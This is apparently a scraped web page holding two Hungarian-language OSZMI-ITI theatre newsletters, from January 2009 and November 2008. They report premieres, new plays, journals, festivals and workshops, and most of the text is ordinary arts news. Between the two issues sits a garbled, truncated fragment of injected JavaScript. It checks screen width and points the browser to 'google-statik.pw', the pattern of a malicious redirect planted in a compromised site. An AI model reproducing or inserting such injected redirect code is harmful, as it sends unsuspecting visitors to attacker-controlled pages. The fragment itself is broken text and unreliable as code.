A Nemzetközi Színházi Intézet Magyar Központjának kiadványa, a Hungaraian Theatre Bulletin legutóbbi száma az alábbi mellékletben tölthető le.

 

Híreink:
OSZMI-ITI HÍRLEVÉL 2009. január

OSZMI-ITI HIRLEVEL 2009/1.

1. Hirek

1.1. Theatre Nanterre-Amandiers (Parizs) - uj bemutatok

1.2. Uj kortars opera: Yvonne, burgundi hercegno

1.3. Januarban ujra megnyilik a londoni Arts Theatre

1.4. A Young Vic nyari programja

1.5.UK - Januari bemutatok

2. Kortars drama

2.1. John Godber: Going Dutch

3. Magyar vonatkozasu hirek

3.1. Konyv Nagy Jozsef koreografusrol

4. Folyoiratok - vitak, tematikus szamok, konyvajanlo

4.1. Theaterheute

4.2. Theatre/Public

5.Fesztivalok

5.1. Holland szinhazi fesztivalok
5.2. Cirkuszfesztival Franciaorszagban
5.3. Choreographic Platform Austria - 2009

6. Felhivas, palyazat, informacio

6.1. Performing Arts Training Today - Nemzetkozi konferencia

6.2. Nemzetkozi workshop - Szergej Osztrenko

6.3. Felhivas koreografusoknak

1. Hirek

1.1. Theatre Nanterre-Amandiers (Parizs) - uj bemutatok

Theatre Nanterre-Amandiers uj bemutatoval kezdi a 2009-es evet. Januar 8-tol 22-ig jatsszak Maia Sandoz meg kiadatlan darabjat, a Maquette suicide (Apres Hamlet)-et - Ongyilkossagi modell (Hamlet utan) - a szerzo rendezeseben. A mu ott kezdodik, ahol a Hamlet befejezodik. A kiralyi csalad megtizedelodott. Haromnapos gyaszt rendeltek el az uj kiraly valasztasat megelozoen. A norveg Fortinbras a favorit. Ez ido alatt nyomozas folyik, hogy kideritsek, ki kit olt meg. Az orszag hagyomanyainak megfeleloen az italboltok szunet nelkul nyitva tartanak, es a danok isznak, es siratjak kiralyukat...

A kovetkezo bemutatora februar 3-an kerul sor. Koltes voyage (Koltes utazik) cimmel Bruno Boeglin viszi szinpadra Bernard-Marie Koltes leveleit. A fiatalon elhunyt francia dramairo munkassaganak talan a levelezese a legrejtelyesebb resze. 1978-ban kozep-amerikai utazasa soran irt levelei adjak a felolvasasra szant irasok gerincet. Az alkotok azt tervezik, hogy ket nyelvu lesz az eloadas, vagyis azoknak az orszagoknak a nyelven is megszolalnak a levelek, amelyekben irt a szerzo. Az eloadassal tehat ellatogatnak Costa Ricaba, Nicaraguaba, Guatmalaba, Mexikoba. A leveleket 2009. aprilisaban jelenteti meg a Minuit kiado.

1.2. Uj kortars opera: Yvonne, burgundi hercegno

Az Opera National de Paris a 2009-es evet osbemutatoval kezdi. A kozonseg az Yvonne, burgundi hercegno cimu kortars operat 2009. januar 24-tol februar 8-ig nezheti meg. A librettot Luc Bondy es Marie-Louise Bischofberger irta Gombrowicz darabja alapjan, a zenet pedig Philippe Boesmans szerezte. Egy interjuban azt nyilatkozta a zeneszerzo, hogy o elsosorban az emberi erzelmek kifejezesere torekszik, a darab szereploit karakterukhoz hiven ohajtotta zeneileg megfogalmazni. A zeneszerzo, aki jelenleg a brusszeli operaban dolgozik, Liege-ben folytatta tanulmanyait, es eloszor 1971-ben hivta fel magara a figyelmet, amikor Upon La-Mi cimu muvevel elnyerte a Prix Italiat.

1.3. Januarban ujra megnyilik a londoni Arts Theatre

2009. januarjatol uj vezetogardaval nyitja meg ismet kapuit a hires Arts Theatre a Leicester Square-en. A szinhazat 1927-ben alapitottak „theatre club"-kent, hogy megkeruljek Lord Chamberlaint es a cenzurat. A 300 fos befogadokepessegu Arts Theatre 2008. juliusi bezarasa elott szamos jelentos szinhazi esemenynek adott otthont: itt volt tobbek kozott 1955-ben Beckett: Godot-ra varva cimu darabjanak angol nyelvu osbemutatoja Peter Hall rendezeseben, majd 1960-ban A gondnok osbemutatoja (r: Donald McWhinnie). Varhatoan Mig Kimpton, a Sound Theatre es a Carl Rosa Opera korabbi igazgatoja all a szinhaz elere.

1.4. A Young Vic nyari programja

Amig a tobbi londoni szinhaz a tavaszi evadtervet hozza nyilvanossagra most, a Young Vic bejelentette nyari programjat. 2009. majus 8-tol 23-ig lathato a Muszorgszkij-ihlette Egy kiallitas kepei cimu tanceloadas, Daniel Kramer rendezeseben, Frauke Requardt koreografus es James Fenton kolto kozremukodesevel. Junius 3-tol 27-ig tekintheto meg a Genesis Young Directors Project kereteben a Kurszk, Bryony Lavery es a szinpadi hangtechnikara specializalodott Sound&Fury tarsulat produkcioja, ami a 2000-ben tortent orosz tengeralattjaro-szerencsetlenseget dolgozza fel. Junius 15. es 20. kozott jatsszak Barry Keeffe Sus-at Gbolahan Obisesan rendezeseben, junius 11-tol julius 4-ig kerul sor Che Walker Been So Long cimu musicaljere, ami Walker 1998-as dramajanak adaptacioja Arthur Darvill megzenesiteseben. A TMA Awarddal jutalmazott, 3-5 eves gyerekeknek keszult Brilliant julius 15. es 18. kozott lathato. Julius 21-en mutatjak be Sarah Kane 4.48 Psychosis cimu darabjat Christian Beneditti rendezeseben, Anamaria Marinca foszereplesevel.

1.5. UK - Januari bemutatok

Januar eleje a szinhazakban mindig csendesnek igerkezik, aztan egyszerre csak megindul a bemutatok ozone, es az erdeklodo nem tud valasztani a kinalkozo programokbol a boseg zavaraban. 2009. januar 14-en lesz a National Theatre Scotland Be Near Me cimu turneprodukciojanak bemutatoja a kilmarnocki Palace Theatre-ben, ami januar 22-tol marcius 14-ig a londoni Donmar Warehouse-ban lathato. A darabot Ian McDiarmid adaptalta Andrew O'Hagan regenyebol, a rendezo John Tiffany. Januar 30-tol februar 21-ig tekintheto meg a Shun-kin, a Complicite tarsulat legujabb koprodukcioja a Barbicanban, Simon McBurney rendezeseben. Az eloadast Jun'ichiro Tanizaki, a huszadik szazad egyik legjelentosebb japan irojanak novellaja ihlette.

2. Kortars drama

2.1. John Godber: Going Dutch

John Godber 1956-ban latta meg a napvilagot egy yorkshire-i banyaszcsaladban, Uptonban. A Bretton Hall College-ban szerzett dramatanari diplomat, majd a Minsthorpe High School dramatagozatanak vezetoje volt, mielott a Hull Truck Theatre Company muveszeti vezetojenek neveztek ki 1984-ben. 2004-ben a Liverpool Hope University professzora lett. Otszor kapott elso dijat az Edinburgh Fringe Fesztivalon, es 1984-ben Fent es lent cimu dramajaval megnyerte a Laurence Olivier Comedy of the Year Awardot. Darabjait vilagszerte jatsszak.

Szereplok: 2 no / 2 ferfi

A frusztralt, kozepkoru hazaspar, Mark es Sally Amszterdamba utaznak Bruce Springsteen koncertre, hogy megunnepeljek Mark otveneves szuletesnapjat. Mark elete nem ugy sikerult, ahogy szerette volna, Sally mellozottnek es maganyosnak erzi magat - es az egesz hajout a csatornan csak tovabb melyiti a boldogtalansagukat. Veluk tart kozos baratnojuk, Gill, aki felkavarja Markot, mivel a ferfi egyetemista koruk ota vonzodik hozza. Gill magaval hozta uj pasijat, a durva es mindenre kesz Karlt, aki pornosztar multjaval kicsit tul sokat tud Amszterdam sotet oldalarol. Ebbol az alaphelyzetbol indul John Godber szellemes komediaja a tarsadalmi szorongas es a kulonbozo kulturak utkozesenek jegyeben.

3. Magyar vonatkozasu hirek

3.1. Konyv Nagy Jozsef koreografusrol

A L'Oeil d'Or Kiado gondozasaban jelent Myriam Bloede konyve: Les Tombeaux de Josef Nadj (Nagy Jozsef sirjai) cimmel. A gazdagon illusztralt mu Nagy Jozsef munkassagat, eloadasainak, szinpadi kepeinek inspiracios forrasait elemzi.

A Centre Choregraphique National d'Orleans kiadta Nagy Jozsef kovetkezo eloadasait bemutato, CD-vel ellatott musorfuzeteit: Les Philosophes (Filozofusok), Woyzek, Paysage apres l'orage (Taj vihar utan) es Petit Psaume du matin (Reggeli zsoltar). A konyv es valamennyi CD az OSZMI Tancarchivumaban helyben hasznalhato.

4. Folyoiratok - vitak, tematikus szamok, konyvajanlo

4.1. Theaterheute

A Theaterheute januari szama Heiner Mullernek tiszteleg, aki 1929. januarjaban szuletett, es iden unnepelne a nyolcvanadik szuletesnapjat. Mullers Beste cimen igenyes szemelvenyvalogatas keszult az iro, kolto, esszeista es szinhazrendezo Heiner Muller 1965 es 1995 kozotti irasaibol, beszedeibol es interjuibol. Az iro es publicista Alexander Kluge a Das Muller-Monument cimu riportban emlekezik vissza kedvenc beszelgetopartnerere. Franz Wille harom kortars szerzo, Kathrin Roggla, Thomas Freyer es Elfriede Jelinek uj darabjaival foglalkozik, melyek kozul Kathrin Roggla Worst Case cimu, a Theater Freiburgban bemutatott alkotasa olvashato a Theaterheute januari dramamellekleteben. A lap naprakeszen tajekoztat minden januarban varhato nemetorszagi premierrol, valamint a hetedik alkalommal, ezuttal Kolnben megrendezett Politik im Freien Theater nevu fesztivalrol.

4.2. Theatre/Public

A lap ebben a szamaban folytatja az amerikai es az europai avantgard szinhaz kapcsolatat taglalo tanulmanyok kozleset. Az olasz nyitas cimu fejezetben kozolt tanulmanyok az 1960-1990 kozotti idoszakot dolgozzak fel, es elsosorban azt mutatjak be, hogy a Living Theatre hogyan hatott az olasz muveszekre, illetve Artaud, Brook es Grotowski milyen kozvetitoszerepet jatszott az amerikai es az olasz szinhazi kulturak kozott. Bruna Filippi kulon tanulmanyt szentel a Societas Raffaello Sanzio mukodesenek, eloadasainak.

Belgium es Hollandia flamand performansz muveszeterol is tobb cikk olvashato, amelyek kozul az egyik Ritsaert ten Cate flamand szinhazi ember es az amerikai Mickery Theater 1965-1991 kozotti mukodeset mutatja be. Az Elfoglalt varos cimu tanulmany pedig Anvers varosa happening es peformansz eloadasait dolgozza fel.

Az angol kiserleti szinhazat taglalo iras eloszor is Patrice Pavis nyoman kiserli meg definialni a performanszot, majd a hiany es jelenlet, tapasztalat es elmelet, helyszin es egyuttmukodes szempontjai szerint vizsgalja a mufajt. Az 1999-ben alakult Shunt tarsulatot kilenc muvesz alkotja, es bar nem kifejezetten kotheto a klasszikus ertelemben vett avantgardhoz az, amit csinalnak, de szinhazuk megis „live event" -kent elemezheto.

A nemetorszagi es franciaorszagi performansz eloadasokkal, avantgarddal es az amerikai hatasokkal is kulon fejezet foglalkozik. Erdemes kiemelni ezek kozul a Rene Pollesch nemet rendezot bemutato cikket, amelyet az USA-ban elo lengyel Andrzej Wirth kritikus irt.

5.Fesztivalok

5.1. Holland szinhazi fesztivalok

A soron kovetkezo holland szinhazi fesztivalok kozul jelentos a 2009. februar 23. es 28. kozott Amszterdamban megrendezendo Something RAW nevu nemzetkozi tancfesztival. Tancosok, koreografusok, es performansz-muveszek elsorangu musorral, interaktiv programokkal, installaciokkal, kiallitasokkal es kiserleti tanceloadasokkal varjak az erdeklodoket. Utrechtben kerul sor 2009. marcius 21. es 29. kozott a Tweetakt ifjusagi szinhazi fesztivalra, ami Hollandiaban es Belgiumban minden evben iranymutato esemenynek szamit az uj tehetsegek felfedezeseben es az ifjusagi szinhazi tendenciak valtozasanak koveteseben.

Az egyik legjelentosebb holland szinhaz, a rotterdami RO Theater 2009. marcius 31. es aprilis 5. kozott harom showcase eloadasat tuzi musorra, hogy az erdeklodok e rovid ido alatt megismerkedhessenek Alize Zandwijk producer es muveszeti vezeto, valamint a fiatal es igeretes szinhazcsinalo, Jetse Batelaan munkajaval. Jetse Batelaan rendezi A Cowboy With His Hands Up Is Probably Not Cheering (A feltett kezu cowboy latvanya nem vidam) cimu showcase-t, ami aprilis 2-an es 3-an lathato majd a RO Theaterben. Alize Zandwijk rendezeseben ket produkcio valosul meg: az holland kritikusok altal sokat meltatott Innocence (Artatlansag), es a Mulheimer Dramatikerpreis-gyoztes Dea Loher darabja, The Last Fire (Az utolso tuz), 2008. legjobb nemet nyelvu kortars dramaja, aminek premierjere marcius 31-en kerul sor.

5.2. Cirkuszfesztival Franciaorszagban

2009. januar 23. es februar 1. kozott rendezik meg a 10. kortars cirkuszfesztivalt La Seyne-sur-Mer-ben. A csillagok elnevezesu rendezvenysorozaton a legnevesebb francia uj cirkuszi iranyzatot kepviselo egyuttesek mutatjak be legujabb eloadasukat. Tobbek kozott lathato lesz a Compagnie Calapiat Risque Zero produkcioja, amely a cimmel ellentetben nem kozvetlenul, direkt modon szol a kockazatrol, a veszelyrol, hanem a titkokrol, az erzelmekrol, a sikerrol es bukasrol beszel a cirkusz eszkozeivel. A Cirque Desaccorde mar jart Magyarorszagon, es most Petites mythologies populaires (Kis nepi mitologiak) cimu eloadasukkal szerepelnek a fesztivalon. Produkciojuk sok kis jelenetbol all, amelyekben az ember lehetetlen fantaziait elevenitik meg, peldaul valaki kirabol egy bankot, otos talalata van a lotton, talalkozik egy foldon kivuli lennyel, fiatalito italt iszik vagy teljesen megvaltoztatja identitasat. A francia, algeriai, marokkoi akrobatakbol es tancosokbol allo Compagnie Cabas Koulouskout ou Applaudis (Egyel, hallgass vagy tapsolj) ket olyan no tortenetet meseli el, akik ket kultura szoritasaba kerult identitasukat keresik. Eloadasukban a tanc, az akrobatika, egyensulyozas keveredik.

A talalkozon reszt vesz tobb svajci cirkusz-szinhaz, valamint Chilebol, Spanyolorszagbol erkezo tarsulatok is.

5.3. Choreographic Platform Austria - 2009

Az utobbi evekben nagy nemzetkozi erdeklodesre tarthat szamot a Choreographic Platform Austria nevu tanc es performance rendezveny, reszvetelre csabitva nezoket, muveszeket, kritikusokat a vilag minden tajarol. A CPA iden 2009. januar 30. es februar 1. kozott lesz Grazban, es harom nap alatt tizenot produkcio tekintheto meg. Nehany nev a fellepok kozul: Christine Gaigg / 2nd Nature: V-TRIKE; Milli Bitterli / artificial horizon: One day at a time; Doris Uhlich SPITZE; Andrei Andrianov & Oleg Soulimenko: The Distribution of Similarities. Sandwiches, a Harmonica, a Guitar, Billa, Metro, U-Bahn and other Things; Superamas: HIGH ART; Liquid Loft / Chris Haring: Running Sushi.

6. Felhivas, palyazat, informacio

6.1. Performing Arts Training Today - Nemzetkozi konferencia

A 2009. aprilis 21. es 24. kozott a szloveniai Bovecben megrendezendo Performing Arts Training Today nevu nemzetkozi konferenciara varjak erdeklodok jelentkezeset, eloadastervek beerkezeset. A felhivas szineszeknek, tanaroknak szol, es azoknak, akik hivatasszeruen foglalkoznak dramapedagogiaval.

Tovabbi informacio:

http://www.iugte.com/projects/conf.reg.php

http://www.iugte.com/projects/PerformingArts.php

6.2. Nemzetkozi workshop - Szergej Osztrenko

A 2009. marcius 9-tol 14-ig Ausztriaban megrendezett nemzetkozi workshop Szergej Osztrenko vezetesevel a biomechanikat, az eloadomuveszi fizikalitast kutatja Meyerhold, Mihail Csehov es Sztanyiszlavszkij modszereiben. A resztvevoknek etkezest es szallast biztositanak.

Szinten Osztrenko vezetesevel nemzetkozi workshop lesz Maltan, 2009. aprilis 27-tol majus 2-ig, intenziv gyakorlati kepzessel, eloadasokkal, beszelgetesekkel.

Tovabbi informacio:

http://www.iugte.com/projects/Meyerhold.php

http://www.iugte.com/projects/PhysicalTheatreLab.php

http://www.iugte.com/projects/Malta.php

6.3. Felhivas koreografusoknak

Az Almada Dance Company nagyszabasu rendezvenyt szervez eloadomuveszek, tancosok szamara Almadaban, 2009. szeptember 10-tol 12-ig. Koreografusok, tanccsoportok es tarsulatok jelentkezhetnek eloadasra szant projectjukkel, ami, ha sikeresen szerepel az elovalogatason, az International Platform of Choreographers es/vagy a Video-Dance Showcase kereteben mutatjak be.

Jelentkezesi hatarido: 2009. februar 20.

http://www.cdanca-almada.pt/en/qda/index.htm

Keszitette: Lakos Anna (szerk.), Rakoczy Anita

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width
 
OSZMI-ITI HÍRLEVÉL 2008. november

OSZMI-ITI HIRLEVEL 2008/11.

1. Hirek

1.1 A sved Riksteatern musora - 2008 osz

1.2. Theatre Royal Haymarket - Godot-ra varva - McKellen es Stewart a foszerepben

1.3. A belgiumi Nemzeti Szinhaz oszi programja

1.4. TANZQUARTIER - BECS

1.5. Lepage a londoni Sadler's Wells-ben

2. Kortars drama

2.1. Eric Assous: Secret de famille (Csaladi titok)

2.2. David Lescot: L'Europeenne (Az europai no)

3. Magyar vonatkozasu hirek

3.1. THEATERHEUTE - Gyulai Varszinhaz

4. Folyoiratok - vitak, tematikus szamok, konyvajanlo

4.1. Theatre Public

5.Fesztivalok

5.1. Eves „fesztival-menetrend"

6. Felhivas, palyazat, informacio

1. Hirek

1.1 A sved Riksteatern musora - 2008 osz

Svedorszagban 3 nemzeti szinhaz, 31 varosi illetve regionalis szinhaz es mintegy 200 fuggetlen tarsulat mukodik, es a 9 millios lakossagbol evente 6 millio a szinhazlatogatok szama. A Riksteatern, az orszag vezeto utazoszinhaza non-profit sved szinhazi egyesuleteket magaba foglalo civil szervezet. Mintegy 60 darabbal turnezik evente 300 helyszinen otthon es kulfoldon azzal a cellal, hogy minden erdeklodo lathassa szinhazakban, parkokban, kozossegi hazakban, fesztivalokon es iskolakban eloadott repertoarukat. A Riksteatern 2008. oszi musoraban szerepel Ibsen: Ha mi holtak feltamadunk Josette Bushell-Mingo rendezeseben, valamint Sibel es Cahit szenvedelyes szerelmi tortenete, a Mot Vaggen Driterio Kasapi adaptaciojaban, ami Fatih Akin 2004-es, dijnyertes Head-On cimu filmjen alapul. A Bagdad Burning cimu dokumentumdarab ( rendezo: Gustav Deinoff) Riverbend sokat emlegetett Bagdad Burning - Girl Blog nevu, iraki blogjan alapul. Juha Jokela dramaja, a Finnorszagban osztatlan sikert arato The Fundamentalist a felelosseg kerdeset celozza, amit sajat magunkert es masok eleteert vallalunk.

1.2. Theatre Royal Haymarket - Godot-ra varva - McKellen es Stewart a foszerepben

Sean Mathias rendezi Samuel Beckett: Godot-ra varva cimu darabjat a ket hires Shakespeare-szinesz, a Gyuruk uraban es a Star Trekben nepszeruve valt Ian McKellen es Patrick Stewart foszereplesevel. Az eloadas, amit 2009. aprilis 30-tol junius 28-ig lathatnak az erdeklodok a Theatre Royal Haymarket-ben, Sean Mathias elso produkcioja a szinhaz muveszeti vezetojekent. A bemutatot 2009. tavaszan turne elozi meg az alabbi helyszineken:Malvern Theatres (marcius 5 - 14); Milton Keynes Theatre (marcius 16 - 21); Brighton Theatre Royal (marcius 23 - 28); Bath Theatre Royal (marcius 30 - aprilis 4); Norwich Theatre Royal (aprilis 6 - 11 ); Edinburgh King's Theatre (aprilis 13 - 18 ); Newcastle Theatre Royal (aprilis 20 - 25)

1.3. A belgiumi Nemzeti Szinhaz oszi programja

Belgiumban a francia kozosseg Nemzeti Szinhaza osszel egy negy, teljesen kulonbozo hangvetelu szindarabot mutat be, kozos bennuk a tema, a fiatalok elete: milyen jovorol almodnak, milyen ma Europaban kamasznak lenni, hogyan lehet egy olyan vilagban felnoni, melyben az individualizmus, a profit utani hajsza a legfontosabb, hogyan valik szet a valosagos es a virtualis vilag az internet koraban. A ciklust alkoto negy darab: Lars Noren: November 20; Jean Lambert: Tete a claques (Pofoznivalo hulye), Ronan Cheneau: Kannibalok, Jeanne Daudoy: Game over (Vege a jateknak).

Az eloadasokat, amelyek kulonbozo szinhazak koprodukcioja reven jottek letre, novemberben tuzi musorara a belga Nemzeti Szinhaz.

Lars Noren darabja, a November 20. egy olyan kamaszt mutat be, akit a tarsadalom tett gyilkossa. A mu egy valosagos torteneten alapul: 2006-ban a nemetorszagi Emsdettenben egy gimnazista fiu fegyverrel a kezeben rontott be hajdani iskolajaba, ahol hidegverrel meggyilkolta nehany osztalytarsat es tanarat, majd onmagaval is vegzett.

Jean Lambert : Pofoznivalo hulye cimu muvenek fohose egy ikerpar. Tizenkettedik szuletesnapjukat keszulnek megunnepelni, de varatlanul letartoztatjak az egyikuket. A vad ellene: gyujtogatas. Tizenket evvel kesobb szabadul, es az unnepi asztalnal furcsa vendegek - babok - tarsasagaban latja viszont testveret. A babok segitsegevel igyekeznek megfejteni, mi tortent, ki volt a gyujtogato, es miert kovette el a tettet.

Ronan Cheneau: Kannibalok-ja a huszas-harmincas eveiket taposo hosok lazadasa az ellen a tarsadalom ellen, amely oket jo fogyasztokent, a pillanat elvezoikent szeretne kezelni. Az eloadas a szinhaz, a tanc, a vizualis muveszetek, cirkusz mufajanak elemeit otvozi.

Jeanne Daudoy: Vege a jateknak foszereploi egy atlagcsalad tagjai. Ahogy minden evben, most is keszulodnek, hogy megunnepeljek a Karacsonyt, de egy ostoba akadaly miatt a nap annal is rosszabbul vegzodik, mint ahogy kezdodott. Az eloadas mely egyutterzessel, humorral abrazolja a mindennapi eletbol ismert hetkoznapi szornyetegeket.

1.4. TANZQUARTIER - BECS

November 20. es 29. kozott lathato az It's Our Pleasure, a Superamas egyuttes es a Tanzquartier kozos produkcioja, ami a szorakozast hajszolo fogyasztoi tarsadalom erzeki oromforrasainak vilagaba vezeti a nezot. Ki a nagyobb muvesz, Picasso vagy Walt Disney? - teszik fel a kerdest az alkotok, akik szerint a kortars muveszet imitaciojaval, jatekos elidegenito effektusaival mar reg meghoditotta a show-business, a televizio es a szorakoztatoipar vilagat.

Az elso heten Hall G az izgalmas Vienna Lounge-a alakul. A latogatok a legkulonbozobb muveszeti formak kolcsonhatasat elvezhetik: helyi es nemzetkozi alkotok filmjeibol, performanszokbol, koncertekbol es installaciokbol valogathatnak.

1.5. Lepage a londoni Sadler's Wells-ben

Robert Lepage nagyszabasu vallalkozasra csatlakozik a tancos Sylvie Guillemhez es a koreografus Russell Maliphant-hoz: Eonnagata cimu kozos produkciojuk 2009. marcius 2. es 8. kozott lesz lathato a Sadler's Wells-ben. A darab fohose Charles de Beaumont, d'Eon lovagja - 18. szazadi iro, diplomata, katona es XV. Lajos King's Secret nevu kemszervezetenek tagja. Valoszinuleg De Beaumont volt az elso kem, aki a transzvesztitizmust eszkozkent hasznalta kituzott celjainak eleresehez. Fel eletet ferfikent, a masik felet nokent elte, es halala napjaig talalgatasok sora kutatta valodi biologiai nemet. Lepage szandekai szerint az eloadas formanyelve erosen kotodik majd az Onnagata Kabuki szinhazi technikahoz, ahol a noket ferfi szineszek jelenitik meg, szelsosegesen stilizalt eszkozokkel.

2. Kortars drama

A francia SACD (Societe des Auteurs et Compositeurs Dramatique) immar interneten jelentkezo informacios folyoirata az Entr'Actes legutobbi szamaban nehany jelentos kortars francia dramairo muvere hivja fel a figyelmet. Ezek kozul nehanyat, kibovitett informaciokkal adunk kozre.

2.1. Eric Assous: Secret de famille (Csaladi titok)

Eric Assous 1956-ban Algeriaban szuletett. Tobb mint nyolcvan radiojatek szerzoje, rendezokent harom rovidfilmet keszitett elso jatekfilmjet pedig 2001-be forgatta. A magyar kozonseg az Egy fecske csinal nyarat cimu filmjebol ismerheti nevet. Szindarabjaival is sikert arat (Sexes tres opposes /Nagyon ellentetes nemek, Petits desorderes amoureux /Kis szerelmes rendetlensegek). Legujabb darabjat, a Csaladi titkot 2008. oktobereben mutatta be a Theatre des Varietes (Parizs) Jean-Luc Moreau rendezeseben.

Szereplok: 2 no, 4 ferfi

Pierre elvalt es maganyos, a fia, Quentin nemregiben jegyezte el a szepseges Clemence-ot, aki azonban nem nagyon sietteti, hogy az ujara huzzak a gyurut. Ennek az az egyszeru oka, hogy nem a fiuba, hanem az apaba szerelemes. Pierre, akinek moralis ertekrendje es tartasa megkerdojelezhetetlen, azon kivul imadja a fiat, termeszetesen kikosarazza a lanyt. Azonban megiscsak nehez mindezt elmondania Quentinnek, ezert inkabb hazudik neki. Egyik hazugsag a masikat koveti, az apa kockazatos improvizaciokba kezd, vagyis ordogi csapdaba kerul.

2.2. David Lescot: L'Europeenne (Az europai no)

David Lescot a mai francia dramairo nemzedek egyik legtehetsegesebb alkotoja 1971-ben szuletett. Nem csak iro, hanem szinhazi rendezo es zeneszerzo. Elso darabjat, a Les Conspirateurs -t (Osszeeskuvok) 1999-ben rendezte meg, ezt kovette ket ujabb dramaja-rendezese (L'Association/ Szovetkezes; L'Amelioration /Jobbitas). 2007-ben a kritikusok dijat kapta az Un Homme en faillite ( Egy csodbe jutott ferfi) cimu darabjanak eloadasaert, amelyet maga rendezett a Comedie de Reims-ben. 2008-ban az SACD fiatal tehetseg-dijat kapta a L'Europeenne (Europai no) cimu darabjaert, amelyet 2009. majusaban tuz musorara a Comedie de Reims.

Szereplok: 4 no, 3 ferfi

A darab arra keres valaszt, hogyan lehetne Europat ujra eleszteni egy magat Beethovennel tehetsegesebbnek tarto zeneszerzo, egy kolto, egy lazado portugal reformer, egy nemet lakberendezono, a passziv tudast kutato belga nyelveszno, egy fantomjellegu szlovak lany, harom zenekart kereso zenesz es egy, a valtozasokat ertetlenul fogado, odivatu hivatalnok, valamint a meg letezo legoregebb europai asszony segitsegevel.

3. Magyar vonatkozasu hirek

3.1. THEATERHEUTE - Gyulai Varszinhaz

A Theaterheute oktoberi szamaban Thomas Irmer a gyulai Shakespeare-Fesztivallal, Silviu Purcarete Szeget szeggel cimu eloadasaval es Schilling Arpad Hamletjevel foglalkozik.

Kethetes Nemzetkozi Shakespeare Fesztival egy kisvarosban a roman-magyar hatar mellett? Ehhez mereszseg kell - irja Thomas Irmer. A 15. szazadban epult Gyulai Var, Kozep-Europa egyetlen epen maradt teglavara ugy emelkedik ki a sik videkbol, mint Macbethe Roman Polanski filmjeben, es udvaran evtizedek ota otthont ad egy szinhaznak. Mivel a varoska hoforrasaival amugy is folyamatosan csalogatja a latogatokat, eszebe jutott az egyebkent Shakespeare-rajongo Gedeon Jozsef intendansnak az, hogy a fesztivalra olyan, a filmmuveszet remekeivel kombinalt, magas szinvonalu szinhazi eloadasokra van szukseg, amelyek kulon vonzerot jelenthetnek a furdovarosba latogatoknak. A Shakespeare Fesztivalok nemzetkozi halozataban a Gyulai Varszinhaz negyedik alkalommal megrendezett Nemzetkozi Shakespeare Fesztivalja Budapest, London, Vilnius, Craiova, Kolozsvar, Zagrab, Szabadka es a japan Niigata-City szinhazait latta vendegul.

A roman rendezo, Purcarete Szeget szeggeljevel a craiovai Nemzeti Szinhazban kivivta maganak a komor Shakespeare-interpretaciok mesterenek jaro cimet. Az eloadast - Shakespeare vigatekanak engesztelo zarlataval ellentetben - sotet, baljos ambivalenciak mozgatjak. A rendezes egyik legnagyobb erteke a hangulatteremto suruseg, ami a felelmetes gephangok, gyors jelenetvaltasok es mozgo falak kozott is letre tud jonni Purcarete szinpadan.

Schilling harom szineszre adaptalt Hamletjet letagadhatatlanul athatja a jatek orome. Schilling muveszi koncepcioja folytatja a sokat meltatott Siraly-rendezes utjat, csak meg radikalisabb iranyba indul: a nezok egyszeru negyszogben ulnek, jelmez es diszlet helyett a szovegkonyv a legfontosabb kellek, a szineszekkel valo kapcsolattartas fo eszkoze. Gyabronka Jozsef, Nagy Zsolt es Raba Roland nagyszeruen alakitjak Hamlet, Claudius es Polonius szerepet, felolvastatnak a szovegkonyvbol a kozonseggel, majd magyarazatokat fuznek hozza, mikozben egyre melyebben vonjak be oket a darabba. Ezalatt a rendezo, aki egyszer csak feloszlatta a hires Kretakor tarsulatat, ott guggol a szinpad peremen. A magyar kritikusok a hajukat tepik az egyik legnagyobb szinhazi tehetseg megdobbento dontesenek hallatan, es ugy gondoljak, hogy ebben a Workshop-Hamletben Schilling uj alapokat keres kiserleti szinhazi formak menten.

Meddig mehet el az ember, kerdezi Thomas Irmer, ha nincs mas eszkoze, csak a szineszek a hetkoznapi ruhajukban, akik tobbek kozott Goethe es Allen Ginsberg vendegszovegekkel kommentaljak a Hamletet, sot, egyes jeleneteket meg is jelenitenek a Shakespeare-mubol? Gyabronka Jozsef, Nagy Zsolt es Raba Roland bebizonyitjak, hogy a jo szineszi jatek eppen eleg latvanyossag. Uj, nem fesztivalmusorra keszult szegenyszinhaz szuletett, amit Schilling magabiztosan vallal. Az eloadas vegen a szineszek, mint utcaszinhazi komediasok, kalapoznak es meghajolnak. Schilling Siralya meg egy messzemenokig zart szinpadi vilagot kepviselt, ahol a nezo reszesulhetett a szineszi fantaziaban. A Hamlet ezzel szemben teljesen nyitott - a nezok egyszerre tarseloadokka valnak, akik a szovegkonyv segitsegevel es a szineszek osztonzesere alkotokent vehetnek reszt a produkcioban. Az adaptalasnak ez a fajtaja csak nagyon ismert klasszikusoknal szokott mukodni, de Schillingeknek meglepo modon sikeruk van a keves szinhazi tapasztalattal rendelkezo budapesti diaksag koreben is. Ez csak azt jelentheti, hogy Schilling pazar technologia es szinpadvarazs nelkuli, de lebilincselo szineszekkel rendelkezo szegenyszinhazaban van valami - es eloadasszammal, piackepesseggel nem torodve Schilling tovabb keresi a szamara kielegito szinpadi format.

4. Folyoiratok - vitak, tematikus szamok, konyvajanlo

4.1. Theatre Public

A Theatre Public 190. szama az amerikai es europai avantgard szinhazi torekveseket mutatja be, dolgozza fel. A kulonbozo tanulmanyok, esszek arra keresnek valaszt, hogy az avantgard, az experimentalis szinhaz, a dramatikus hagyomanyok dekonstrukcioja, az eloadas, a rendezes elutasitasa hogyan jelenik meg az europai es az amerikai szinhazban. A lap a temaval foglalkozo teoretikus, torteneti tanulmanyokat is kozol, tobbek kozott Hans-Thiels Lehmann, Richard Schechner, Mel Gordon, Jean-Marie Pradier tollabol. A New York / Europa: egybeesesek cimu cikkben Tom Bishop azt vizsgalja, hogy New Yorkban a hatvanas-hetvenes evekben mukodo szinhazak milyen fontos szerepet jatszottak a kepiseg ujraertelmezeseben, hogyan valtozott a szoveg es az eloadas viszonya, a szoveg es gesztusnyelv, a test elsobbsegenek viszonya, valamint mindez hogyan kerult at Europaba.

Az amerikai avantgard Franciaorszagban cimu cikkeben Georges Banu azt vizsgalja, hogy az amerikai avantgard miert hatott olyan erosen a francia szinhazra. Francoise Kourilsky pedig a Bread and Pupet 68-as franciaorszagi vendegszerepleseit dolgozza fel.

5.Fesztivalok

5.1. Eves „fesztival-menetrend"

